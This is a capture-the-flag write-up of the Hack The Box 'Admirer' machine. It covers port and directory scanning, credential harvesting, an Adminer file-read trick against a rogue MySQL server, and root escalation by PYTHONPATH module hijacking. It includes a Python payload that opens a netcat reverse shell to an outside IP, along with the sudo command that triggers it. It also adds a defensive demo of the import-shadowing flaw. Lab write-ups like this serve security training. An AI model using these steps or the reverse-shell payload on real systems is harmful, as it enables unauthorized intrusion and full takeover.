12. Hack The Box. Level Medium: Admirer walkthrough. Admirer and RCE vulnerability due to environment swapping

13 December 2024 5 minutes Author: Lady Liberty

Looking for a detailed walkthrough of the Admirer machine on Hack The Box? In this article, we take a step-by-step look at the process of identifying and exploiting vulnerabilities to achieve remote code execution (RCE). Hack The Box is a popular cybersecurity training and practice platform. The Admirer machine offers a complex challenge that requires the researcher to have the skills to gather information, analyze data, and exploit vulnerabilities.

Step-by-step guide

We continue publishing write-ups for retired machines from the HackTheBox platform. Connecting to the lab means joining a private network together with experienced information security specialists, so it is not advisable to connect from a host that holds important data.

Recon

This machine has the IP address 10.10.10.187, which we add to /etc/hosts.

10.10.10.187 	admirer.htb

First, a scan of open ports is performed. To speed up the process, instead of using nmap to scan all ports, the scan is performed using masscan. All TCP and UDP ports are analyzed via the tun0 interface at a rate of 500 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.187 --rate=500

Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.

nmap -A admirer.htb -p80,22,21

Based on the results of the nmap scan, a further course of action is determined. FTP and SSH services that require credentials are detected on the server, as well as an Apache web server. The robots.txt file is available on the web server, which contains a single entry — the admin-dir directory. Due to the lack of additional information, the next step is to scan the directories.

For this purpose, a quick tool called gobuster is used. The parameters specify:

  • scan type — directories (dir);

  • site URL (-u);

  • dictionary to scan (-w);

  • required file extensions (-x);

  • number of threads (-t).

gobuster dir -t 128 -u http://admirer.htb/admin-dir/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt

We find two files: the first contains email addresses, and the second contains various credentials.

And among the credentials we find a login and password for FTP. We connect:

Let's look around the FTP server.

We download all the files.

There is a suspicion that this archive is a backup of the site, let’s unzip it and see what’s in it.

mkdir HTML
mv html.tar.gz HTML/ 
cd HTML
tar -xf html.tar.gz

The first file is no different from the existing one, but among the credentials there are some that we don’t have.

Attempts to use them do not yield results. You need to search for the user and pass strings in all downloaded files.

grep -R -i "user\|pass" ./

Two more passwords for the same user are discovered, so all available credentials have now been collected.

But none of them get us anywhere.

Entry Point

When trying to run actions that are not permitted on the site, we receive a refusal.

Since all executable files are located in the utility-scripts directory, let’s scan it on the host, looking for php files.

gobuster dir -t 128 -u http://admirer.htb/utility-scripts/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php

We find the file adminer.php.

After searching for information, the sources we found made it clear how to obtain RCE: if you specify your own host as the database server, a connection attempt from the target can be observed.

Start the mysql service on the local host.

sudo service mysql start
sudo mysql -u root

And let’s create a user for authorization.

create user ralfadmirer@'%' identified by 'ralfadmirer';
create database admirerdb;
grant all privileges on admirerdb.* to 'ralfadmirer';

The configuration file /etc/mysql/mariadb.conf.d/50-server.cnf is modified to allow access to the host. To do this, the bind-address line is commented out, after which the service is restarted.

sudo service mysql restart

We log in on behalf of the newly created user.

USER

We select our database.

Next, let’s create a table.

And we will execute an SQL query to read the index.php file, where we can find the credentials (as it was in the backup).

load data local infile '../index.php'
into table admirerdb.admirertable
fields terminated by '\n'

Now let’s move on to our created table.

And we will find the credentials.

SSH authentication was successfully completed using this password.

ROOT

Check the sudo settings.

Thus, this script can be executed as a superuser. During its analysis, a call to a Python script was detected, which is also executed with sudo privileges.

And the script itself specifies an implicit import.

Environment variables are checked, including paths to Python.

This way, you can create a file with the same name that contains a function with the same name but does something different. By changing the environment variable and then running the program, the created file gets executed instead of the original module.

def make_archive():
    import os
    os.system('nc 10.10.15.110 4321 -e "/bin/sh"')

make_archive()

Let’s run the script.

sudo PYTHONPATH='/tmp/' /opt/scripts/admin_tasks.sh

We get a backconnect shell.

Full control over this machine has been gained.
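As an added example (not code from the original write-up), the following Python script shows why the PYTHONPATH trick works and what closes it: a directory named in PYTHONPATH is searched before the standard library, so a shadow shutil.py (assumed here to be the module that provides make_archive) wins, while an interpreter started with -I (isolated mode) ignores PYTHONPATH entirely. The shadow module is constructed and only leaves a marker.

```python
import os
import subprocess
import sys
import tempfile
import textwrap

# Constructed stand-in for the stdlib module the privileged script imports:
# it defines make_archive like the real one but only returns a marker.
SHADOW_MODULE = textwrap.dedent("""
    SHADOW = True
    def make_archive(*args, **kwargs):
        return "shadowed"
""")

# The child interpreter reports which 'shutil' its import actually resolved to.
PROBE = ("import shutil; "
         "print('SHADOW' if getattr(shutil, 'SHADOW', False) else 'STDLIB')")


def import_source(isolated: bool) -> str:
    """Start a child interpreter with PYTHONPATH pointing at a directory that
    holds a shadow shutil.py and return 'SHADOW' or 'STDLIB' depending on which
    module was imported. isolated=True adds -I, which discards PYTHONPATH."""
    with tempfile.TemporaryDirectory() as hijack_dir:
        with open(os.path.join(hijack_dir, "shutil.py"), "w") as f:
            f.write(SHADOW_MODULE)
        env = dict(os.environ, PYTHONPATH=hijack_dir)
        # -S skips site.py so the result reflects only PYTHONPATH handling.
        flags = ["-I", "-S"] if isolated else ["-S"]
        cmd = [sys.executable, *flags, "-c", PROBE]
        out = subprocess.run(cmd, env=env, capture_output=True, text=True,
                             check=True)
        return out.stdout.strip()


if __name__ == "__main__":
    print("default interpreter:", import_source(False))  # SHADOW
    print("python -I          :", import_source(True))   # STDLIB
```

Running privileged Python with -I (or at least -E) and not granting SETENV in sudoers removes the caller's control over the module search path.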

Conclusion

The article describes in detail the process of exploiting vulnerabilities on the Hack The Box Admirer machine. Using a sequential approach — from port scanning and searching for hidden directories to script analysis and manipulation of environment variables — it was possible to gain complete control over the system. This experience demonstrates the importance of careful study of configurations and working with access rights in the field of cybersecurity.
